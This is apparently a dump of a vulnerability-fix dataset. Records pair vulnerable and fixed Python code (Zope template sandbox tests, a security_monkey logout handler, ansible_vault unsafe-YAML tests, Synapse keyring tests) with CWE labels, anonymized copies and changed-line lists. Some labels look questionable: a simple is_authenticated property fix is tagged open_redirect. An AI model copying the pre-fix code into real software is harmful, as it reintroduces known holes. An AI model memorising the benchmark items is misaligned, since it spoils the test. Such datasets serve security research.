with warnings.catch_warnings():
warnings.simplefilter('ignore')
self.assertEqual(VAR_5.evaluate('d/_'), 'under')
def FUNC_13(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('d/?blank'), 'blank')
def FUNC_14(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('x | python:1+1'), 2)
def FUNC_15(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('x | python:int'), int)
def FUNC_16(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('x | string:x'), 'x')
def FUNC_17(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('x | string:$one'), '1')
def FUNC_18(self):
VAR_5 = self._makeContext()
self.assertTrue(VAR_5.evaluate('x | not:exists:x'))
def FUNC_19(self):
VAR_5 = self._makeContext()
VAR_5.beginScope()
VAR_5.setRepeat('loop', "python:[1,2,3]")
self.assertTrue(VAR_5.evaluate("python:repeat['loop'].odd()"))
VAR_5.endScope()
def FUNC_20(self):
from zope.tales.expressions import DeferWrapper
VAR_5 = self._makeContext()
VAR_7 = VAR_5.evaluate('defer: b')
self.assertIsInstance(VAR_7, DeferWrapper)
def FUNC_21(self):
from zope.tales.expressions import LazyWrapper
VAR_5 = self._makeContext()
VAR_8 = VAR_5.evaluate('lazy: b')
self.assertIsInstance(VAR_8, LazyWrapper)
def FUNC_22(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('path:'), None)
def FUNC_23(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('path: '), None)
def FUNC_24(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate(''), None)
def FUNC_25(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate(' \n'), None)
def FUNC_26(self):
VAR_9 = self._makeEngine()
VAR_5 = self._makeContext()
VAR_10 = VAR_5.evaluate(VAR_9.compile('string:x'))
self.assertEqual(VAR_10, 'x')
self.assertIsInstance(VAR_10, str)
def FUNC_27(self):
VAR_9 = self._makeEngine()
VAR_5 = self._makeContext()
VAR_11 = VAR_9.compile('string:$eightbit')
self.assertRaises(UnicodeDecodeError,
VAR_5.evaluate, VAR_11)
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
StrictUnicodeEncodingConflictResolver
from zope.component import provideUtility
provideUtility(StrictUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
self.assertEqual(VAR_5.evaluate(VAR_11), 'äüö')
def FUNC_28(self):
VAR_5 = self._makeContext()
self.assertIs(VAR_5.evaluate('True'), True)
self.assertIs(VAR_5.evaluate('False'), False)
self.assertIs(VAR_5.evaluate('nocall: test'), safe_builtins["test"])
class CLASS_1(CLASS_0, unittest.TestCase):
def FUNC_2(self):
from Products.PageTemplates.Expressions import createZopeEngine
return createZopeEngine()
def FUNC_29(self):
VAR_5 = self._makeContext()
with self.assertRaises(KeyError):
VAR_5.evaluate("nocall:open")
def FUNC_30(self):
VAR_5 = self._makeContext()
self.assertIs(VAR_5.evaluate('nocall: list'), safe_builtins["list"])
def FUNC_31(self):
VAR_5 = self._makeContext()
with self.assertRaises(NotFound):
VAR_5.evaluate("context/__class__")
with self.assertRaises((NotFound, LocationError)):
VAR_5.evaluate("nocall: random/_itertools/repeat")
with self.assertRaises((NotFound, LocationError)):
VAR_5.evaluate("random/_itertools/repeat/foobar")
class CLASS_2(CLASS_0, unittest.TestCase):
def FUNC_2(self):
from Products.PageTemplates.Expressions import createTrustedZopeEngine
return createTrustedZopeEngine()
def FUNC_29(self):
VAR_5 = self._makeContext()
self.assertIs(VAR_5.evaluate("nocall:open"), open)
def FUNC_30(self):
VAR_5 = self._makeContext()
self.assertIs(VAR_5.evaluate('nocall: list'), list)
class CLASS_3(PlacelessSetup, unittest.TestCase):
def FUNC_32(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
DefaultUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(DefaultUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
VAR_12 = getUtility(IUnicodeEncodingConflictResolver)
self.assertRaises(UnicodeDecodeError,
VAR_12.resolve, None, b'\xe4\xfc\xf6', None)
def FUNC_33(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
StrictUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(StrictUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
VAR_12 = getUtility(IUnicodeEncodingConflictResolver)
VAR_13 = '\xe4\xfc\xe4'
self.assertEqual(VAR_12.resolve(None, VAR_13, None), VAR_13)
def FUNC_34(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
IgnoringUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(IgnoringUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
VAR_12 = getUtility(IUnicodeEncodingConflictResolver)
self.assertEqual(VAR_12.resolve(None, b'\xe4\xfc\xf6', None), '')
def FUNC_35(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
ReplacingUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(ReplacingUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
VAR_12 = getUtility(IUnicodeEncodingConflictResolver)
self.assertEqual(VAR_12.resolve(None, b'\xe4\xfc\xf6', None),
'\ufffd\ufffd\ufffd')
class CLASS_4(unittest.TestCase):
def FUNC_36(self):
from Products.PageTemplates.Expressions import ZopeContext
return ZopeContext
def FUNC_37(self, VAR_1=None, VAR_2=None):
if VAR_1 is None:
VAR_1 = self._makeEngine()
if VAR_2 is None:
VAR_2 = {}
return self._getTargetClass()(VAR_1, VAR_2)
def FUNC_2(self):
class CLASS_7:
pass
return CLASS_7()
def FUNC_38(self):
from zope.interface.verify import verifyClass
from zope.tal.interfaces import ITALExpressionEngine
verifyClass(ITALExpressionEngine, self._getTargetClass())
def FUNC_39(self):
from zope.interface.verify import verifyObject
from zope.tal.interfaces import ITALExpressionEngine
verifyObject(ITALExpressionEngine, self._makeOne())
def FUNC_40(self):
VAR_14 = self._makeOne()
VAR_15 = VAR_14.createErrorInfo(AttributeError('nonesuch'), (12, 3))
self.assertTrue(VAR_15.type is AttributeError)
self.assertEqual(VAR_15.__allow_access_to_unprotected_subobjects__, 1)
| [
3,
7,
8,
10,
16,
19,
21,
23,
25,
28,
31,
35,
38,
44,
52,
53,
57,
61,
63,
73,
77,
81,
85,
89,
94,
98,
100,
101,
102,
105,
109,
111,
112,
117,
121,
125,
129,
133,
137,
141,
148,
154,
160,
164,
168,
172,
176,
178,
181,
182,
186,
188,
194,
195,
204,
210,
211,
213,
217,
218,
219,
224,
228,
230,
232,
235,
238,
241,
242,
244,
248,
249,
250,
254,
258,
259,
261,
274,
287,
299,
312,
313,
315,
319,
326,
331,
336,
341,
343,
348
] | [
3,
8,
9,
11,
17,
20,
22,
24,
26,
29,
32,
36,
39,
45,
53,
54,
58,
62,
64,
74,
78,
82,
86,
90,
95,
99,
101,
102,
103,
106,
110,
112,
113,
118,
122,
126,
130,
134,
138,
142,
149,
155,
161,
165,
169,
173,
177,
179,
182,
183,
187,
189,
195,
196,
205,
211,
212,
214,
218,
219,
220,
225,
229,
231,
233,
236,
239,
242,
243,
245,
249,
250,
251,
255,
259,
260,
262,
275,
288,
300,
313,
314,
316,
320,
327,
332,
337,
342,
344,
349
] |
4CWE-601
| # Copyright 2014 Netflix, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from flask_login import current_user, logout_user
from flask_restful import Resource
# End the Flask-Logins session
from security_monkey import rbac
class Logout(Resource):
decorators = [rbac.exempt]
def get(self):
if not current_user.is_authenticated():
return "Must be logged in to log out", 200
logout_user()
return "Logged Out", 200
| # Copyright 2014 Netflix, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from flask_login import current_user, logout_user
from flask_restful import Resource
# End the Flask-Logins session
from security_monkey import rbac
class Logout(Resource):
decorators = [rbac.exempt]
def get(self):
if not current_user.is_authenticated:
return "Must be logged in to log out", 200
logout_user()
return "Logged Out", 200
| open_redirect | {
"code": [
" if not current_user.is_authenticated():"
],
"line_no": [
28
]
} | {
"code": [
" if not current_user.is_authenticated:"
],
"line_no": [
28
]
} |
from flask_login import current_user, logout_user
from flask_restful import Resource
from security_monkey import rbac
class CLASS_0(Resource):
VAR_0 = [rbac.exempt]
def FUNC_0(self):
if not current_user.is_authenticated():
return "Must be logged in to log out", 200
logout_user()
return "Logged Out", 200
|
from flask_login import current_user, logout_user
from flask_restful import Resource
from security_monkey import rbac
class CLASS_0(Resource):
VAR_0 = [rbac.exempt]
def FUNC_0(self):
if not current_user.is_authenticated:
return "Must be logged in to log out", 200
logout_user()
return "Logged Out", 200
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
17,
18,
19,
21,
22,
24,
26,
30,
33
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
17,
18,
19,
21,
22,
24,
26,
30,
33
] |
5CWE-94
| import os
from tempfile import mkstemp
from testfixtures import ShouldRaise
from ansible.errors import AnsibleError
here = os.path.dirname(os.path.abspath(__file__))
class TestVaultLoad(object):
def _getTargetClass(self):
from ansible_vault import Vault
return Vault
def _makeOne(self, password):
return self._getTargetClass()(password)
def test_can(self):
fpath = os.path.join(here, 'file', 'vault.txt')
vault = self._makeOne('password')
assert vault.load(open(fpath).read()) == 'test'
def test_cannot(self):
fpath = os.path.join(here, 'file', 'vault.txt')
vault = self._makeOne('invalid-password')
with ShouldRaise(AnsibleError('Decryption failed')):
vault.load(open(fpath).read())
class TestVaultDump(object):
def _getTargetClass(self):
from ansible_vault import Vault
return Vault
def _makeOne(self, password):
return self._getTargetClass()(password)
def test_dump_file(self):
fpath = mkstemp()[1]
with open(fpath, 'w+b') as fp:
write_vault = self._makeOne('password')
write_vault.dump('test', fp)
with open(fpath, 'r+b') as fp:
read_vault = self._makeOne('password')
assert read_vault.load(fp.read()) == 'test'
os.remove(fpath)
def test_dump_text(self):
write_vault = self._makeOne('password')
dumped = write_vault.dump('test')
read_vault = self._makeOne('password')
assert read_vault.load(dumped) == 'test'
| import os
from tempfile import mkstemp
from ansible.errors import AnsibleError
from testfixtures import ShouldRaise
from yaml.constructor import ConstructorError
here = os.path.dirname(os.path.abspath(__file__))
class TestVaultLoad(object):
def _getTargetClass(self):
from ansible_vault import Vault
return Vault
def _makeOne(self, password):
return self._getTargetClass()(password)
def test_can(self):
fpath = os.path.join(here, 'file', 'vault.txt')
vault = self._makeOne('password')
assert vault.load(open(fpath).read()) == 'test'
def test_cannot(self):
fpath = os.path.join(here, 'file', 'vault.txt')
vault = self._makeOne('invalid-password')
with ShouldRaise(AnsibleError('Decryption failed')):
vault.load(open(fpath).read())
def test_not_pwned(self):
fpath = os.path.join(here, 'file', 'pwned.txt')
vault = self._makeOne('password')
with ShouldRaise(ConstructorError):
vault.load(open(fpath).read())
class TestVaultDump(object):
def _getTargetClass(self):
from ansible_vault import Vault
return Vault
def _makeOne(self, password):
return self._getTargetClass()(password)
def test_dump_file(self):
fpath = mkstemp()[1]
with open(fpath, 'w+b') as fp:
write_vault = self._makeOne('password')
write_vault.dump('test', fp)
with open(fpath, 'r+b') as fp:
read_vault = self._makeOne('password')
assert read_vault.load(fp.read()) == 'test'
os.remove(fpath)
def test_dump_text(self):
write_vault = self._makeOne('password')
dumped = write_vault.dump('test')
read_vault = self._makeOne('password')
assert read_vault.load(dumped) == 'test'
| remote_code_execution | {
"code": [
"from testfixtures import ShouldRaise"
],
"line_no": [
4
]
} | {
"code": [
"from yaml.constructor import ConstructorError",
" fpath = os.path.join(here, 'file', 'pwned.txt')",
" vault = self._makeOne('password')",
" with ShouldRaise(ConstructorError):",
" vault.load(open(fpath).read())"
],
"line_no": [
6,
32,
33,
34,
35
]
} | import os
from tempfile import mkstemp
from testfixtures import ShouldRaise
from ansible.errors import AnsibleError
VAR_0 = os.path.dirname(os.path.abspath(__file__))
class CLASS_0(object):
def FUNC_0(self):
from ansible_vault import Vault
return Vault
def FUNC_1(self, VAR_1):
return self._getTargetClass()(VAR_1)
def FUNC_2(self):
VAR_2 = os.path.join(VAR_0, 'file', 'vault.txt')
VAR_3 = self._makeOne('password')
assert VAR_3.load(open(VAR_2).read()) == 'test'
def FUNC_3(self):
VAR_2 = os.path.join(VAR_0, 'file', 'vault.txt')
VAR_3 = self._makeOne('invalid-password')
with ShouldRaise(AnsibleError('Decryption failed')):
VAR_3.load(open(VAR_2).read())
class CLASS_1(object):
def FUNC_0(self):
from ansible_vault import Vault
return Vault
def FUNC_1(self, VAR_1):
return self._getTargetClass()(VAR_1)
def FUNC_4(self):
VAR_2 = mkstemp()[1]
with open(VAR_2, 'w+b') as fp:
VAR_4 = self._makeOne('password')
VAR_4.dump('test', fp)
with open(VAR_2, 'r+b') as fp:
VAR_6 = self._makeOne('password')
assert VAR_6.load(fp.read()) == 'test'
os.remove(VAR_2)
def FUNC_5(self):
VAR_4 = self._makeOne('password')
VAR_5 = VAR_4.dump('test')
VAR_6 = self._makeOne('password')
assert VAR_6.load(VAR_5) == 'test'
| import os
from tempfile import mkstemp
from ansible.errors import AnsibleError
from testfixtures import ShouldRaise
from yaml.constructor import ConstructorError
VAR_0 = os.path.dirname(os.path.abspath(__file__))
class CLASS_0(object):
def FUNC_0(self):
from ansible_vault import Vault
return Vault
def FUNC_1(self, VAR_1):
return self._getTargetClass()(VAR_1)
def FUNC_2(self):
VAR_2 = os.path.join(VAR_0, 'file', 'vault.txt')
VAR_3 = self._makeOne('password')
assert VAR_3.load(open(VAR_2).read()) == 'test'
def FUNC_3(self):
VAR_2 = os.path.join(VAR_0, 'file', 'vault.txt')
VAR_3 = self._makeOne('invalid-password')
with ShouldRaise(AnsibleError('Decryption failed')):
VAR_3.load(open(VAR_2).read())
def FUNC_4(self):
VAR_2 = os.path.join(VAR_0, 'file', 'pwned.txt')
VAR_3 = self._makeOne('password')
with ShouldRaise(ConstructorError):
VAR_3.load(open(VAR_2).read())
class CLASS_1(object):
def FUNC_0(self):
from ansible_vault import Vault
return Vault
def FUNC_1(self, VAR_1):
return self._getTargetClass()(VAR_1)
def FUNC_5(self):
VAR_2 = mkstemp()[1]
with open(VAR_2, 'w+b') as fp:
VAR_4 = self._makeOne('password')
VAR_4.dump('test', fp)
with open(VAR_2, 'r+b') as fp:
VAR_6 = self._makeOne('password')
assert VAR_6.load(fp.read()) == 'test'
os.remove(VAR_2)
def FUNC_6(self):
VAR_4 = self._makeOne('password')
VAR_5 = VAR_4.dump('test')
VAR_6 = self._makeOne('password')
assert VAR_6.load(VAR_5) == 'test'
| [
3,
5,
7,
8,
10,
11,
16,
19,
24,
30,
31,
36,
39,
45,
49,
51,
55,
58
] | [
3,
7,
8,
10,
11,
16,
19,
24,
30,
36,
37,
42,
45,
51,
55,
57,
61,
64
] |
4CWE-601
| # -*- coding: utf-8 -*-
# Copyright 2017 New Vector Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
from mock import Mock
import canonicaljson
import signedjson.key
import signedjson.sign
from nacl.signing import SigningKey
from signedjson.key import encode_verify_key_base64, get_verify_key
from twisted.internet import defer
from twisted.internet.defer import Deferred, ensureDeferred
from synapse.api.errors import SynapseError
from synapse.crypto import keyring
from synapse.crypto.keyring import (
PerspectivesKeyFetcher,
ServerKeyFetcher,
StoreKeyFetcher,
)
from synapse.logging.context import (
LoggingContext,
current_context,
make_deferred_yieldable,
)
from synapse.storage.keys import FetchKeyResult
from tests import unittest
from tests.test_utils import make_awaitable
from tests.unittest import logcontext_clean
class MockPerspectiveServer:
def __init__(self):
self.server_name = "mock_server"
self.key = signedjson.key.generate_signing_key(0)
def get_verify_keys(self):
vk = signedjson.key.get_verify_key(self.key)
return {"%s:%s" % (vk.alg, vk.version): encode_verify_key_base64(vk)}
def get_signed_key(self, server_name, verify_key):
key_id = "%s:%s" % (verify_key.alg, verify_key.version)
res = {
"server_name": server_name,
"old_verify_keys": {},
"valid_until_ts": time.time() * 1000 + 3600,
"verify_keys": {key_id: {"key": encode_verify_key_base64(verify_key)}},
}
self.sign_response(res)
return res
def sign_response(self, res):
signedjson.sign.sign_json(res, self.server_name, self.key)
@logcontext_clean
class KeyringTestCase(unittest.HomeserverTestCase):
def check_context(self, val, expected):
self.assertEquals(getattr(current_context(), "request", None), expected)
return val
def test_verify_json_objects_for_server_awaits_previous_requests(self):
mock_fetcher = keyring.KeyFetcher()
mock_fetcher.get_keys = Mock()
kr = keyring.Keyring(self.hs, key_fetchers=(mock_fetcher,))
# a signed object that we are going to try to validate
key1 = signedjson.key.generate_signing_key(1)
json1 = {}
signedjson.sign.sign_json(json1, "server10", key1)
# start off a first set of lookups. We make the mock fetcher block until this
# deferred completes.
first_lookup_deferred = Deferred()
async def first_lookup_fetch(keys_to_fetch):
self.assertEquals(current_context().request, "context_11")
self.assertEqual(keys_to_fetch, {"server10": {get_key_id(key1): 0}})
await make_deferred_yieldable(first_lookup_deferred)
return {
"server10": {
get_key_id(key1): FetchKeyResult(get_verify_key(key1), 100)
}
}
mock_fetcher.get_keys.side_effect = first_lookup_fetch
async def first_lookup():
with LoggingContext("context_11") as context_11:
context_11.request = "context_11"
res_deferreds = kr.verify_json_objects_for_server(
[("server10", json1, 0, "test10"), ("server11", {}, 0, "test11")]
)
# the unsigned json should be rejected pretty quickly
self.assertTrue(res_deferreds[1].called)
try:
await res_deferreds[1]
self.assertFalse("unsigned json didn't cause a failure")
except SynapseError:
pass
self.assertFalse(res_deferreds[0].called)
res_deferreds[0].addBoth(self.check_context, None)
await make_deferred_yieldable(res_deferreds[0])
d0 = ensureDeferred(first_lookup())
mock_fetcher.get_keys.assert_called_once()
# a second request for a server with outstanding requests
# should block rather than start a second call
async def second_lookup_fetch(keys_to_fetch):
self.assertEquals(current_context().request, "context_12")
return {
"server10": {
get_key_id(key1): FetchKeyResult(get_verify_key(key1), 100)
}
}
mock_fetcher.get_keys.reset_mock()
mock_fetcher.get_keys.side_effect = second_lookup_fetch
second_lookup_state = [0]
async def second_lookup():
with LoggingContext("context_12") as context_12:
context_12.request = "context_12"
res_deferreds_2 = kr.verify_json_objects_for_server(
[("server10", json1, 0, "test")]
)
res_deferreds_2[0].addBoth(self.check_context, None)
second_lookup_state[0] = 1
await make_deferred_yieldable(res_deferreds_2[0])
second_lookup_state[0] = 2
d2 = ensureDeferred(second_lookup())
self.pump()
# the second request should be pending, but the fetcher should not yet have been
# called
self.assertEqual(second_lookup_state[0], 1)
mock_fetcher.get_keys.assert_not_called()
# complete the first request
first_lookup_deferred.callback(None)
# and now both verifications should succeed.
self.get_success(d0)
self.get_success(d2)
def test_verify_json_for_server(self):
kr = keyring.Keyring(self.hs)
key1 = signedjson.key.generate_signing_key(1)
r = self.hs.get_datastore().store_server_verify_keys(
"server9",
time.time() * 1000,
[("server9", get_key_id(key1), FetchKeyResult(get_verify_key(key1), 1000))],
)
self.get_success(r)
json1 = {}
signedjson.sign.sign_json(json1, "server9", key1)
# should fail immediately on an unsigned object
d = _verify_json_for_server(kr, "server9", {}, 0, "test unsigned")
self.get_failure(d, SynapseError)
# should succeed on a signed object
d = _verify_json_for_server(kr, "server9", json1, 500, "test signed")
# self.assertFalse(d.called)
self.get_success(d)
def test_verify_json_for_server_with_null_valid_until_ms(self):
"""Tests that we correctly handle key requests for keys we've stored
with a null `ts_valid_until_ms`
"""
mock_fetcher = keyring.KeyFetcher()
mock_fetcher.get_keys = Mock(return_value=make_awaitable({}))
kr = keyring.Keyring(
self.hs, key_fetchers=(StoreKeyFetcher(self.hs), mock_fetcher)
)
key1 = signedjson.key.generate_signing_key(1)
r = self.hs.get_datastore().store_server_verify_keys(
"server9",
time.time() * 1000,
[("server9", get_key_id(key1), FetchKeyResult(get_verify_key(key1), None))],
)
self.get_success(r)
json1 = {}
signedjson.sign.sign_json(json1, "server9", key1)
# should fail immediately on an unsigned object
d = _verify_json_for_server(kr, "server9", {}, 0, "test unsigned")
self.get_failure(d, SynapseError)
# should fail on a signed object with a non-zero minimum_valid_until_ms,
# as it tries to refetch the keys and fails.
d = _verify_json_for_server(
kr, "server9", json1, 500, "test signed non-zero min"
)
self.get_failure(d, SynapseError)
# We expect the keyring tried to refetch the key once.
mock_fetcher.get_keys.assert_called_once_with(
{"server9": {get_key_id(key1): 500}}
)
# should succeed on a signed object with a 0 minimum_valid_until_ms
d = _verify_json_for_server(
kr, "server9", json1, 0, "test signed with zero min"
)
self.get_success(d)
def test_verify_json_dedupes_key_requests(self):
"""Two requests for the same key should be deduped."""
key1 = signedjson.key.generate_signing_key(1)
async def get_keys(keys_to_fetch):
# there should only be one request object (with the max validity)
self.assertEqual(keys_to_fetch, {"server1": {get_key_id(key1): 1500}})
return {
"server1": {
get_key_id(key1): FetchKeyResult(get_verify_key(key1), 1200)
}
}
mock_fetcher = keyring.KeyFetcher()
mock_fetcher.get_keys = Mock(side_effect=get_keys)
kr = keyring.Keyring(self.hs, key_fetchers=(mock_fetcher,))
json1 = {}
signedjson.sign.sign_json(json1, "server1", key1)
# the first request should succeed; the second should fail because the key
# has expired
results = kr.verify_json_objects_for_server(
[("server1", json1, 500, "test1"), ("server1", json1, 1500, "test2")]
)
self.assertEqual(len(results), 2)
self.get_success(results[0])
e = self.get_failure(results[1], SynapseError).value
self.assertEqual(e.errcode, "M_UNAUTHORIZED")
self.assertEqual(e.code, 401)
# there should have been a single call to the fetcher
mock_fetcher.get_keys.assert_called_once()
def test_verify_json_falls_back_to_other_fetchers(self):
"""If the first fetcher cannot provide a recent enough key, we fall back"""
key1 = signedjson.key.generate_signing_key(1)
async def get_keys1(keys_to_fetch):
self.assertEqual(keys_to_fetch, {"server1": {get_key_id(key1): 1500}})
return {
"server1": {get_key_id(key1): FetchKeyResult(get_verify_key(key1), 800)}
}
async def get_keys2(keys_to_fetch):
self.assertEqual(keys_to_fetch, {"server1": {get_key_id(key1): 1500}})
return {
"server1": {
get_key_id(key1): FetchKeyResult(get_verify_key(key1), 1200)
}
}
mock_fetcher1 = keyring.KeyFetcher()
mock_fetcher1.get_keys = Mock(side_effect=get_keys1)
mock_fetcher2 = keyring.KeyFetcher()
mock_fetcher2.get_keys = Mock(side_effect=get_keys2)
kr = keyring.Keyring(self.hs, key_fetchers=(mock_fetcher1, mock_fetcher2))
json1 = {}
signedjson.sign.sign_json(json1, "server1", key1)
results = kr.verify_json_objects_for_server(
[("server1", json1, 1200, "test1"), ("server1", json1, 1500, "test2")]
)
self.assertEqual(len(results), 2)
self.get_success(results[0])
e = self.get_failure(results[1], SynapseError).value
self.assertEqual(e.errcode, "M_UNAUTHORIZED")
self.assertEqual(e.code, 401)
# there should have been a single call to each fetcher
mock_fetcher1.get_keys.assert_called_once()
mock_fetcher2.get_keys.assert_called_once()
@logcontext_clean
class ServerKeyFetcherTestCase(unittest.HomeserverTestCase):
def make_homeserver(self, reactor, clock):
self.http_client = Mock()
hs = self.setup_test_homeserver(http_client=self.http_client)
return hs
def test_get_keys_from_server(self):
# arbitrarily advance the clock a bit
self.reactor.advance(100)
SERVER_NAME = "server2"
fetcher = ServerKeyFetcher(self.hs)
testkey = signedjson.key.generate_signing_key("ver1")
testverifykey = signedjson.key.get_verify_key(testkey)
testverifykey_id = "ed25519:ver1"
VALID_UNTIL_TS = 200 * 1000
# valid response
response = {
"server_name": SERVER_NAME,
"old_verify_keys": {},
"valid_until_ts": VALID_UNTIL_TS,
"verify_keys": {
testverifykey_id: {
"key": signedjson.key.encode_verify_key_base64(testverifykey)
}
},
}
signedjson.sign.sign_json(response, SERVER_NAME, testkey)
async def get_json(destination, path, **kwargs):
self.assertEqual(destination, SERVER_NAME)
self.assertEqual(path, "/_matrix/key/v2/server/key1")
return response
self.http_client.get_json.side_effect = get_json
keys_to_fetch = {SERVER_NAME: {"key1": 0}}
keys = self.get_success(fetcher.get_keys(keys_to_fetch))
k = keys[SERVER_NAME][testverifykey_id]
self.assertEqual(k.valid_until_ts, VALID_UNTIL_TS)
self.assertEqual(k.verify_key, testverifykey)
self.assertEqual(k.verify_key.alg, "ed25519")
self.assertEqual(k.verify_key.version, "ver1")
# check that the perspectives store is correctly updated
lookup_triplet = (SERVER_NAME, testverifykey_id, None)
key_json = self.get_success(
self.hs.get_datastore().get_server_keys_json([lookup_triplet])
)
res = key_json[lookup_triplet]
self.assertEqual(len(res), 1)
res = res[0]
self.assertEqual(res["key_id"], testverifykey_id)
self.assertEqual(res["from_server"], SERVER_NAME)
self.assertEqual(res["ts_added_ms"], self.reactor.seconds() * 1000)
self.assertEqual(res["ts_valid_until_ms"], VALID_UNTIL_TS)
# we expect it to be encoded as canonical json *before* it hits the db
self.assertEqual(
bytes(res["key_json"]), canonicaljson.encode_canonical_json(response)
)
# change the server name: the result should be ignored
response["server_name"] = "OTHER_SERVER"
keys = self.get_success(fetcher.get_keys(keys_to_fetch))
self.assertEqual(keys, {})
class PerspectivesKeyFetcherTestCase(unittest.HomeserverTestCase):
def make_homeserver(self, reactor, clock):
self.mock_perspective_server = MockPerspectiveServer()
self.http_client = Mock()
config = self.default_config()
config["trusted_key_servers"] = [
{
"server_name": self.mock_perspective_server.server_name,
"verify_keys": self.mock_perspective_server.get_verify_keys(),
}
]
return self.setup_test_homeserver(http_client=self.http_client, config=config)
def build_perspectives_response(
self, server_name: str, signing_key: SigningKey, valid_until_ts: int,
) -> dict:
"""
Build a valid perspectives server response to a request for the given key
"""
verify_key = signedjson.key.get_verify_key(signing_key)
verifykey_id = "%s:%s" % (verify_key.alg, verify_key.version)
response = {
"server_name": server_name,
"old_verify_keys": {},
"valid_until_ts": valid_until_ts,
"verify_keys": {
verifykey_id: {
"key": signedjson.key.encode_verify_key_base64(verify_key)
}
},
}
# the response must be signed by both the origin server and the perspectives
# server.
signedjson.sign.sign_json(response, server_name, signing_key)
self.mock_perspective_server.sign_response(response)
return response
def expect_outgoing_key_query(
self, expected_server_name: str, expected_key_id: str, response: dict
) -> None:
"""
Tell the mock http client to expect a perspectives-server key query
"""
async def post_json(destination, path, data, **kwargs):
self.assertEqual(destination, self.mock_perspective_server.server_name)
self.assertEqual(path, "/_matrix/key/v2/query")
# check that the request is for the expected key
q = data["server_keys"]
self.assertEqual(list(q[expected_server_name].keys()), [expected_key_id])
return {"server_keys": [response]}
self.http_client.post_json.side_effect = post_json
def test_get_keys_from_perspectives(self):
# arbitrarily advance the clock a bit
self.reactor.advance(100)
fetcher = PerspectivesKeyFetcher(self.hs)
SERVER_NAME = "server2"
testkey = signedjson.key.generate_signing_key("ver1")
testverifykey = signedjson.key.get_verify_key(testkey)
testverifykey_id = "ed25519:ver1"
VALID_UNTIL_TS = 200 * 1000
response = self.build_perspectives_response(
SERVER_NAME, testkey, VALID_UNTIL_TS,
)
self.expect_outgoing_key_query(SERVER_NAME, "key1", response)
keys_to_fetch = {SERVER_NAME: {"key1": 0}}
keys = self.get_success(fetcher.get_keys(keys_to_fetch))
self.assertIn(SERVER_NAME, keys)
k = keys[SERVER_NAME][testverifykey_id]
self.assertEqual(k.valid_until_ts, VALID_UNTIL_TS)
self.assertEqual(k.verify_key, testverifykey)
self.assertEqual(k.verify_key.alg, "ed25519")
self.assertEqual(k.verify_key.version, "ver1")
# check that the perspectives store is correctly updated
lookup_triplet = (SERVER_NAME, testverifykey_id, None)
key_json = self.get_success(
self.hs.get_datastore().get_server_keys_json([lookup_triplet])
)
res = key_json[lookup_triplet]
self.assertEqual(len(res), 1)
res = res[0]
self.assertEqual(res["key_id"], testverifykey_id)
self.assertEqual(res["from_server"], self.mock_perspective_server.server_name)
self.assertEqual(res["ts_added_ms"], self.reactor.seconds() * 1000)
self.assertEqual(res["ts_valid_until_ms"], VALID_UNTIL_TS)
self.assertEqual(
bytes(res["key_json"]), canonicaljson.encode_canonical_json(response)
)
def test_get_perspectives_own_key(self):
"""Check that we can get the perspectives server's own keys
This is slightly complicated by the fact that the perspectives server may
use different keys for signing notary responses.
"""
# arbitrarily advance the clock a bit
self.reactor.advance(100)
fetcher = PerspectivesKeyFetcher(self.hs)
SERVER_NAME = self.mock_perspective_server.server_name
testkey = signedjson.key.generate_signing_key("ver1")
testverifykey = signedjson.key.get_verify_key(testkey)
testverifykey_id = "ed25519:ver1"
